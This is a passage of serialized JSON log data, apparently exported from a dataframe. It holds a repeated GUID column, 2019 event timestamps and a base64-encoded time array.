de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"AKA0fP+EdkIAcDV8/4R2QgDwpHz/hHZCAKCxfP+EdkIAMKuD/oR2QgDQ1JH+hHZCAODVkf6EdkIAUD+S/oR2QgBwUZL+hHZCAKD3oP6EdkIAACCv/oR2QgDwIq/+hHZCAFCHr/6EdkIAAJ2v/oR2QgAAnEH/hHZCABCdQf+EdkIAkO9B/4R2QgAQGkL/hHZCADC/UP+EdkIAACcW/4R2QgCgUCT/hHZCALBRJP+EdkIA8Kck/4R2QgCgzST/hHZCAABzM/+EdkIAALNe/YR2QgDQ3Gz9hHZCAODdbP2EdkIA8Eht/YR2QgAQWm39hHZCAACD6fyEdkIA0Kz3/IR2QgCwrff8hHZCABAD+PyEdkIAACn4/IR2QgBwN8z8hHZCAABg2vyEdkIAQGHa/IR2QgDQutr8hHZCABDe2vyEdkIAAD+n+4R2QgAwaLX7hHZCAEBptfuEdkIAIMW1+4R2QgCg5bX7hHZCAHCP2/6EdkIAcHT2/oR2QgBQe/b+hHZCAEB/9v6EdkIAEID2/oR2QgAAg/b+hHZCAOCE9v6EdkIA8IX2/oR2QgBAifb+hHZCAOCJ9v6EdkIAgIr2/oR2QgAwjfb+hHZCAFCQ9v6EdkIAcJP2/oR2QgBQlPb+hHZCAACX9v6EdkIA8Jn2/oR2QgBwnPb+hHZCACCf9v6EdkIA0KH2/oR2QgBwpvb+hHZCAMCp9v6EdkIAUK32/oR2QgBwsPb+hHZCABCx9v6EdkIAMLjp/oR2QgBwuen+hHZCANAW6v6EdkIA0DXq/oR2QgCQPvP+hHZCAHBA8/6EdkIAEEHz/oR2QgDwTPP+hHZCAJBN8/6EdkIA4FXz/oR2QgAgV/P+hHZCAPBc8/6EdkIA0F3z/oR2QgBwX/P+hHZCAOBf8/6EdkIAYHHz/oR2QgCgcvP+hHZCALCb8/6EdkIAkMbz/oR2QgAwo/T+hHZCALAc9f6EdkIAsB31/oR2QgAwH/X+hHZCAKAg9f6EdkIAECL1/oR2QgAQJvX+hHZCAGA99f6EdkIAwEH1/oR2QgAwR/X+hHZCAFBL9f6EdkIAUFD1/oR2QgAQU/X+hHZCABBY9f6EdkIAIKr1/oR2QgAQrfX+hHZCANCx9f6EdkIAwLT1/oR2QgBQufX+hHZCAEC89f6EdkIAcMD1/oR2QgCQw/X+hHZCAPDH9f6EdkIA0Mr1/oR2QgDQzvX+hHZCAPDR9f6EdkIAENb1/oR2QgAw2fX+hHZCADDd9f6EdkIAEOD1/oR2QgCw5PX+hHZCAHBh9f6EdkIAkGX1/oR2QgCwbPX+hHZCADBw9f6EdkIAMHT1/oR2QgCwd/X+hHZCAAB69f6EdkIAcHr1/oR2QgBwevX+hHZCABCF9f6EdkIAkIj1/oR2QgDAjPX+hHZCABCQ9f6EdkIAkGWs/IR2QgDAfaz8hHZCAKDrrvyEdkIAIJb1/oR2QgDgmfX+hHZCAECe9f6EdkIA8KT1/oR2QgCANfb+hHZCAPA29v6EdkIAEDr2/oR2QgAwPfb+hHZCAFA/9v6EdkIAAEf2/oR2QgAQSPb+hHZCALBJ9v6EdkIAwEr2/oR2QgAATPb+hHZCANBM9v6EdkIAEE72/oR2QgAgT/b+hHZCAEBS9v6EdkIA0FX2/oR2QgDwWPb+hHZCABBc9v6EdkIAMF/2/oR2QgCAYvb+hHZCADBl9v6EdkIA4Gb2/oR2QgDwZ/b+hHZCAEBr9v6EdkIAMG72/oR2QgBQcfb+hHZCABC29v6EdkIAQLb2/oR2QgCQuPb+hHZCADC/9v6EdkIAIML2/oR2QgAQxfb+hHZCAFDH9v6EdkIAAMn2/oR2QgAgzPb+hHZCAMDM9v6EdkIAINH2/oR2QgAA7Pb+hHZCADDw9v6EdkIAYPX2/oR2QgCgFL38hHZCALAVvfyEdkIA0HK9/IR2QgAAkb38hHZCAKD/e/2EdkIAACiK/YR2QgAQKYr9hHZCANCRiv2EdkIAoKWK/YR2QgAwn5H8hHZCAPAyk/yEdkIA8Pj2/oR2QgDA+fb+hHZCAAD79v6EdkIAEPz2/oR2QgAwAPf+hHZCACAD9/6EdkIAQAb3/oR2QgAwCff+hHZCAJAJ9/6EdkIAYA73/oR2QgDgEPf+hHZCADAT9/6EdkIAIBf3/oR2QgBAGvf+hHZCADAd9/6EdkIAUCD3/oR2QgBwI/f+hHZCACAm9/6EdkIAQCn3/oR2QgBwLff+hHZCAMAw9/6EdkIAcDP3/oR2QgCQOvf+hHZCALA+9/6EdkIAcEH3/oR2QgAgRPf+hHZCABBH9/6EdkIA8En3/oR2QgAQTPf+hHZCAPCK9/6EdkIA0Nv4/oR2QgAQ7/X+hHZCAEDz9f6EdkIA0Pb1/oR2QgAw+/X+hHZCAFD/9f6EdkIAkAT2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAoAv2/oR2QgDQC/b+hHZCADAQ9v6EdkIAUBP2/oR2QgAAFfb+hHZCAFAY9v6EdkIAIB32/oR2QgAAX2b+hHZCAACIdP6EdkIAsIp0/oR2QgCg9nT+hHZCAAAFdf6EdkIAoMif/IR2QgDgyZ/8hHZCAPAqoPyEdkIAAEWg/IR2QgAAbxz8hHZCAACYKvyEdkIAEJkq/IR2QgCQCiv8hHZCAHAVK/yEdkIAAM8G/YR2QgAA+BT9hHZCABD5FP2EdkIAsE4V/YR2QgDQURX9hHZCAHB1Ff2EdkIAgAkf/YR2QgBQCh/9hHZCAAAbJP2EdkIAAIvE+4R2QgAAtNL7hHZCABC10vuEdkIA8AzT+4R2QgBwMdP7hHZCAABTdPyEdkIAoHyC/IR2QgCwfYL8hHZCACDjgvyEdkIAAPmC/IR2QgAAuzn8hHZCANBmQvyEdkIAMORH/IR2QgBA5Uf8hHZCAKBSSPyEdkIA0GFI/IR2QgAgHEr8hHZCAABDvv6EdkIAcGzM/oR2QgBwbcz+hHZCALDDzP6EdkIAYM/M/oR2QgAw6cz+hHZCAKAHV/yEdkIAcDBl/IR2QgBwMWX8hHZCAOCaZfyEdkIAAK1l/IR2QgAwBAf/hHZCAEAFB/+EdkIA0F4H/4R2QgBwgQf/hHZCAA